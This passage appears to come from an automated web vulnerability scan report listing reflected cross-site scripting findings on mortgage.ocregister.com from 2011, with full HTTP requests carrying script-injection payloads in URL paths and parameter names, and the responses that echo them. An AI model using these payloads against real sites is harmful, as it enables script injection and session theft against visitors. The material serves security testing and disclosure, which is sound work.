<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078d23d\"><script>alert(1)</script>6e84ace3326/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d03c"><script>alert(1)</script>c44ede61d27 was submitted in the REST URL parameter 2. This input was echoed as 1d03c\"><script>alert(1)</script>c44ede61d27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/071d03c"><script>alert(1)</script>c44ede61d27/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/071d03c\"><script>alert(1)</script>c44ede61d27/feed/" /> ...[SNIP]...
1.227. http://mortgage.ocregister.com/2007/07/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62aca"><script>alert(1)</script>e6bbf50b3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62aca\"><script>alert(1)</script>e6bbf50b3b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/07/?62aca"><script>alert(1)</script>e6bbf50b3b1=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/07/?62aca\"><script>alert(1)</script>e6bbf50b3b1=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7bc"><script>alert(1)</script>5aaea72dd5b was submitted in the REST URL parameter 1. This input was echoed as ab7bc\"><script>alert(1)</script>5aaea72dd5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007ab7bc"><script>alert(1)</script>5aaea72dd5b/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007ab7bc\"><script>alert(1)</script>5aaea72dd5b/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b467"><script>alert(1)</script>edf8b7e6341 was submitted in the REST URL parameter 2. This input was echoed as 3b467\"><script>alert(1)</script>edf8b7e6341 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/083b467"><script>alert(1)</script>edf8b7e6341/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/083b467\"><script>alert(1)</script>edf8b7e6341/feed/" />
...[SNIP]...
1.230. http://mortgage.ocregister.com/2007/08/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7dfe"><script>alert(1)</script>03f410c0f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7dfe\"><script>alert(1)</script>03f410c0f9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/08/?c7dfe"><script>alert(1)</script>03f410c0f9f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/08/?c7dfe\"><script>alert(1)</script>03f410c0f9f=1feed/" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193b6"><script>alert(1)</script>602a3651353 was submitted in the REST URL parameter 1. This input was echoed as 193b6\"><script>alert(1)</script>602a3651353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007193b6"><script>alert(1)</script>602a3651353/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007193b6\"><script>alert(1)</script>602a3651353/09/feed/" />
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab9b"><script>alert(1)</script>7e39935c7da was submitted in the REST URL parameter 2. This input was echoed as eab9b\"><script>alert(1)</script>7e39935c7da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/09eab9b"><script>alert(1)</script>7e39935c7da/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09eab9b\"><script>alert(1)</script>7e39935c7da/feed/" />
...[SNIP]...
1.233. http://mortgage.ocregister.com/2007/09/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7116"><script>alert(1)</script>1999014b26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7116\"><script>alert(1)</script>1999014b26e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/09/?a7116"><script>alert(1)</script>1999014b26e=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09/?a7116\"><script>alert(1)</script>1999014b26e=1feed/" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bfb6"><script>alert(1)</script>2ffcd926e6b was submitted in the REST URL parameter 1. This input was echoed as 8bfb6\"><script>alert(1)</script>2ffcd926e6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20078bfb6"><script>alert(1)</script>2ffcd926e6b/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078bfb6\"><script>alert(1)</script>2ffcd926e6b/10/feed/" />
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218bc"><script>alert(1)</script>3aaf6a800aa was submitted in the REST URL parameter 2. This input was echoed as 218bc\"><script>alert(1)</script>3aaf6a800aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/10218bc"><script>alert(1)</script>3aaf6a800aa/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10218bc\"><script>alert(1)</script>3aaf6a800aa/feed/" />
...[SNIP]...
1.236. http://mortgage.ocregister.com/2007/10/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a6b"><script>alert(1)</script>aa7394ea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7a6b\"><script>alert(1)</script>aa7394ea76f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/10/?b7a6b"><script>alert(1)</script>aa7394ea76f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10/?b7a6b\"><script>alert(1)</script>aa7394ea76f=1feed/" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78913"><script>alert(1)</script>415c27e9059 was submitted in the REST URL parameter 1. This input was echoed as 78913\"><script>alert(1)</script>415c27e9059 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200778913"><script>alert(1)</script>415c27e9059/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200778913\"><script>alert(1)</script>415c27e9059/11/feed/" />
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a46"><script>alert(1)</script>b3caab2696d was submitted in the REST URL parameter 2. This input was echoed as 55a46\"><script>alert(1)</script>b3caab2696d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/1155a46"><script>alert(1)</script>b3caab2696d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/1155a46\"><script>alert(1)</script>b3caab2696d/feed/" />
...[SNIP]...
1.239. http://mortgage.ocregister.com/2007/11/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d88ca"><script>alert(1)</script>829bb9d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d88ca\"><script>alert(1)</script>829bb9d7991 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/11/?d88ca"><script>alert(1)</script>829bb9d7991=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/11/?d88ca\"><script>alert(1)</script>829bb9d7991=1feed/" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83bb0"><script>alert(1)</script>5b51746308e was submitted in the REST URL parameter 1. This input was echoed as 83bb0\"><script>alert(1)</script>5b51746308e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200783bb0"><script>alert(1)</script>5b51746308e/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
